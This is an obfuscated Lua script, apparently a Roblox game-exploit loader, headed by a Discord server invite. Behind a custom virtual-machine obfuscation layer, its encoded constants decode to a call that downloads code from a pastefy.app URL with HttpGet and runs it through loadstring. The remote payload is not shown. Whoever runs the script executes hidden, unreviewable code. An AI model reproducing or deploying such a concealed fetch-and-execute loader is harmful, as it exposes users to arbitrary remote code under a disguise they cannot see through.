--[[



     JOIN MY SERVER: https://discord.gg/UgQAPcBtpy



]]--


local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v79=0;local v80;while true do if (v79==0) then v80=v2(v0(v30,16));if v19 then local v103=v5(v80,v19);v19=nil;return v103;else return v80;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v81=1065 -(68 + 997) ;local v82;while true do if (v81==(0 -0)) then v82=(v31/((5 -3)^(v32-(1 -0))))%((4 -2)^(((v33-(620 -(555 + 64))) -(v32-1)) + (932 -(857 + (1344 -(226 + 1044)))))) ;return v82-(v82%(569 -(367 + 201))) ;end end else local v83=(4036 -3109) -(193 + 21 + 713) ;local v84;while true do if (v83==(0 + 0)) then v84=(1 + 1)^(v32-1) ;return (((v31%(v84 + v84))>=v84) and (878 -(282 + (712 -(32 + 85))))) or (1637 -((2170 -647) + 114)) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + 2 );v18=v18 + 2 + 0 ;return (v36 * (57 + 199)) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + 3 );v18=v18 + (961 -(892 + 65)) ;return (v40 * (40022563 -23245347)) + (v39 * 65536) + (v38 * (472 -216)) + v37 ;end local function v24() local v41=v23();local v42=v23();local v43=1 -(0 + 0) ;local v44=(v20(v42,351 -(87 + (1035 -(201 + 571))) ,4 + 16 ) * ((3 -1)^(212 -(67 + 113)))) + v41 ;local v45=v20(v42,16 + 5 ,75 -44 );local v46=((v20(v42,(1162 -(116 + 1022)) + 8 )==(3 -2)) and  -(953 -(802 + 150))) or ((8 -6) -1) ;if (v45==0) then if (v44==(0 -0)) then return v46 * (0 + (0 -0)) ;else local v93=0;while true do if (v93==(0 -0)) then v45=998 -(915 + 82) ;v43=0;break;end end end elseif (v45==(3621 -1574)) then return ((v44==(0 -0)) and (v46 * ((1 + 0)/((0 -0) -0)))) or (v46 * NaN) ;end return v8(v46,v45-(2509 -(998 + 488)) ) * (v43 + (v44/((1 + 1)^(1239 -(1069 + (977 -(814 + 45))))))) ;end local function v25(v47) local v48;if  not v47 then local v85=0 -0 ;while true do if (v85==(0 + 0)) then v47=v23();if (v47==((1080 -(1020 + 60)) + 0)) then return "";end break;end end end v48=v3(v16,v18,(v18 + v47) -(886 -(261 + 624)) );v18=v18 + v47 ;local v49={};for v63=1 -0 , #v48 do v49[v63]=v2(v1(v3(v48,v63,v63)));end return v6(v49);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v50=(function() return 0 + 0 ;end)();local v51=(function() return;end)();local v52=(function() return;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();while true do if ((1 + 1)==v50) then for v94= #"~",v23() do local v95=(function() return 0 + 0 ;end)();local v96=(function() return;end)();while true do if (v95~=(202 -(14 + 188))) then else v96=(function() return v21();end)();if (v20(v96, #"[", #",")~=(675 -(534 + 141))) then else local v130=(function() return 0;end)();local v131=(function() return;end)();local v132=(function() return;end)();local v133=(function() return;end)();while true do if (v130~=(2 + 1)) then else if (v20(v132, #"-19", #"gha")== #" ") then v133[ #"0313"]=(function() return v56[v133[ #"?id="]];end)();end v51[v94]=(function() return v133;end)();break;end if (2==v130) then if (v20(v132, #">", #"/")~= #"}") then else v133[2 + 0 ]=(function() return v56[v133[3 -1 ]];end)();end if (v20(v132,2 + 0 ,1 + 1 )== #",") then v133[ #"gha"]=(function() return v56[v133[ #"-19"]];end)();end v130=(function() return 1639 -(1373 + 263) ;end)();end if (v130==(1 + 0)) then local v159=(function() return 0 -0 ;end)();local v160=(function() return;end)();while true do if (v159==(0 -0)) then v160=(function() return 0 -0 ;end)();while true do if (v160==(2 -1)) then v130=(function() return 1386 -(746 + 638) ;end)();break;end if ((0 + 0)==v160) then local v166=(function() return 0 + 0 ;end)();while true do if (1~=v166) then else v160=(function() return 342 -(218 + 123) ;end)();break;end if ((396 -(115 + 281))==v166) then v133=(function() return {v22(),v22(),nil,nil};end)();if (v131==0) then local v167=(function() return 0 + 0 ;end)();local v168=(function() return;end)();while true do if (v167==(0 -0)) then v168=(function() return 0;end)();while true do if ((0 + 0)==v168) then v133[ #"19("]=(function() return v22();end)();v133[ #"0836"]=(function() return v22();end)();break;end end break;end end elseif (v131== #"}") then v133[ #"xxx"]=(function() return v23();end)();elseif (v131==2) then v133[ #"xnx"]=(function() return v23() -(2^(576 -(306 + 254))) ;end)();elseif (v131== #"19(") then local v173=(function() return 0;end)();local v174=(function() return;end)();while true do if (v173~=(0 -0)) then else v174=(function() return 0 + 0 ;end)();while true do if (v174==(0 -0)) then v133[ #"19("]=(function() return v23() -((7 -5)^(883 -(550 + 317))) ;end)();v133[ #"?id="]=(function() return v22();end)();break;end end break;end end end v166=(function() return 1;end)();end end end end break;end end end if (v130==(0 -0)) then local v161=(function() return 0;end)();while true do if ((1 + 0)~=v161) then else v130=(function() return 1;end)();break;end if (v161==0) then v131=(function() return v20(v96,4 -2 , #"91(");end)();v132=(function() return v20(v96, #"0836",609 -(268 + 335) );end)();v161=(function() return 1 -0 ;end)();end end end end end break;end end end for v97= #"\\",v23() do v52[v97-#"|" ]=(function() return v28();end)();end return v54;end if ( #"]"==v50) then local v89=(function() return 0 -0 ;end)();local v90=(function() return;end)();while true do if (v89==(285 -(134 + 151))) then v90=(function() return 0;end)();while true do if ((292 -(60 + 230))==v90) then v50=(function() return 1667 -(970 + 695) ;end)();break;end if (v90==(572 -(426 + 146))) then v55=(function() return v23();end)();v56=(function() return {};end)();v90=(function() return 1 + 0 ;end)();end if (v90==(1 -0)) then for v138= #"<",v55 do local v139=(function() return 1456 -(282 + 1174) ;end)();local v140=(function() return;end)();local v141=(function() return;end)();local v142=(function() return;end)();while true do if (v139==0) then v140=(function() return 1990 -(582 + 1408) ;end)();v141=(function() return nil;end)();v139=(function() return 812 -(569 + 242) ;end)();end if (v139~=(3 -2)) then else v142=(function() return nil;end)();while true do if (v140==(0 -0)) then v141=(function() return v21();end)();v142=(function() return nil;end)();v140=(function() return 3 -2 ;end)();end if (v140==1) then if (v141== #" ") then v142=(function() return v21()~=0 ;end)();elseif (v141==2) then v142=(function() return v24();end)();elseif (v141== #"91(") then v142=(function() return v25();end)();end v56[v138]=(function() return v142;end)();break;end end break;end end end v54[ #"-19"]=(function() return v21();end)();v90=(function() return 2;end)();end end break;end end end if (v50==(1824 -(1195 + 629))) then local v91=(function() return 1251 -(721 + 530) ;end)();local v92=(function() return;end)();while true do if (v91~=(1271 -(945 + 326))) then else v92=(function() return 0 -0 ;end)();while true do if (v92==1) then v53=(function() return {};end)();v54=(function() return {v51,v52,nil,v53};end)();v92=(function() return 243 -(187 + 54) ;end)();end if (v92==(702 -(271 + 429))) then v50=(function() return  #"|";end)();break;end if (v92~=0) then else v51=(function() return {};end)();v52=(function() return {};end)();v92=(function() return 1 + 0 ;end)();end end break;end end end end end local function v29(v57,v58,v59) local v60=v57[1501 -(1408 + 92) ];local v61=v57[1 + 1 ];local v62=v57[(3282 -2193) -((765 -(244 + 60)) + 481 + 144) ];return function(...) local v65=v60;local v66=v61;local v67=v62;local v68=v27;local v69=1289 -(993 + 295) ;local v70= -(1 + 0);local v71={};local v72={...};local v73=v12("#",...) -(2 -1) ;local v74={};local v75={};for v86=1171 -(418 + 753) ,v73 do if (v86>=v67) then v71[v86-v67 ]=v72[v86 + (406 -(118 + 287)) ];else v75[v86]=v72[v86 + 1 + 0 ];end end local v76=(v73-v67) + 1 + 0 ;local v77;local v78;while true do v77=v65[v69];v78=v77[1 + 0 ];if (v78<=(1125 -(118 + 1003))) then if (v78<=(2 -1)) then if (v78==(0 + 0)) then v75[v77[531 -(406 + 123) ]]=v59[v77[1 + 2 ]];else do return;end end elseif (v78<=(1771 -(1749 + 20))) then v75[v77[(477 -(41 + 435)) + 1 ]]();elseif ((v78==(3 + 0)) or (164>=2785)) then local v143=v77[1324 -(1249 + 73) ];local v144=v75[v77[(1003 -(938 + 63)) + 1 ]];v75[v143 + 1 + 0 + 0 ]=v144;v75[v143]=v144[v77[3 + 1 ]];else v75[v77[(1129 -(936 + 189)) -2 ]]=v77[1148 -(466 + 224 + 455) ];end elseif ((v78<=6) or (525==2109)) then if (v78==(11 -6)) then local v106;local v107,v108;local v109;local v110;v75[v77[5 -(1616 -(1565 + 48)) ]]={};v69=v69 + (1901 -(106 + 1794)) ;v77=v65[v69];v75[v77[1 + 1 ]]=v59[v77[1 + 2 ]];v69=v69 + (2 -1) ;v77=v65[v69];v75[v77[5 -3 ]]=v59[v77[117 -(4 + 110) ]];v69=v69 + (585 -(57 + 527)) ;v77=v65[v69];v110=v77[1429 -(41 + 1386) ];v109=v75[v77[106 -(11 + 6 + 86) ]];v75[v110 + (732 -(476 + 255)) ]=v109;v75[v110]=v109[v77[(2272 -(782 + 356)) -((636 -(176 + 91)) + 761) ]];v69=v69 + 1 + 0 ;v77=v65[v69];v75[v77[3 -1 ]]=v77[8 -5 ];v69=v69 + (167 -(122 + 44)) ;v77=v65[v69];v75[v77[2 -0 ]]=v77[5 -2 ]~=((0 -0) -0) ;v69=v69 + 1 + 0 ;v77=v65[v69];v110=v77[2 + 0 ];v107,v108=v68(v75[v110](v13(v75,v110 + 1 + 0 ,v77[5 -2 ])));v70=(v108 + v110) -(1 + 0) ;v106=0 + 0 ;for v135=v110,v70 do v106=v106 + (66 -((44 -14) + 35)) ;v75[v135]=v107[v106];end v69=v69 + (1093 -(975 + 117)) + 0 ;v77=v65[v69];v110=v77[1259 -(1043 + 214) ];v75[v110]=v75[v110](v13(v75,v110 + (1505 -(363 + 1141)) ,v70));v69=v69 + (3 -2) ;v77=v65[v69];v75[v77[1214 -(323 + 889) ]]();v69=v69 + (2 -1) ;v77=v65[v69];do return;end else local v127=v77[2 + (1875 -(157 + 1718)) ];v75[v127]=v75[v127](v13(v75,v127 + (581 -(361 + 219)) ,v70));end elseif (v78<=(327 -(53 + 267))) then v75[v77[1 + 0 + 1 ]]=v77[416 -((53 -38) + 398) ]~=(982 -(18 + 964)) ;elseif ((33==33) and (v78>(30 -22))) then local v150=v77[2 + 0 ];local v151,v152=v68(v75[v150](v13(v75,v150 + 1 + 0 ,v77[853 -(20 + 830) ])));v70=(v152 + v150) -(1 + 0) ;local v153=0 + 0 ;for v155=v150,v70 do v153=v153 + (127 -(116 + 10)) ;v75[v155]=v151[v153];end else v75[v77[1 + 1 ]]={};end v69=v69 + (739 -(542 + 196)) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403203Q00682Q7470733A2Q2F706173746566792E612Q702F524D3668714838702F726177000A4Q00057Q00122Q000100013Q00122Q000200023Q00202Q00020002000300122Q000400046Q000500016Q000200056Q00013Q00024Q0001000100016Q00017Q00",v9(),...);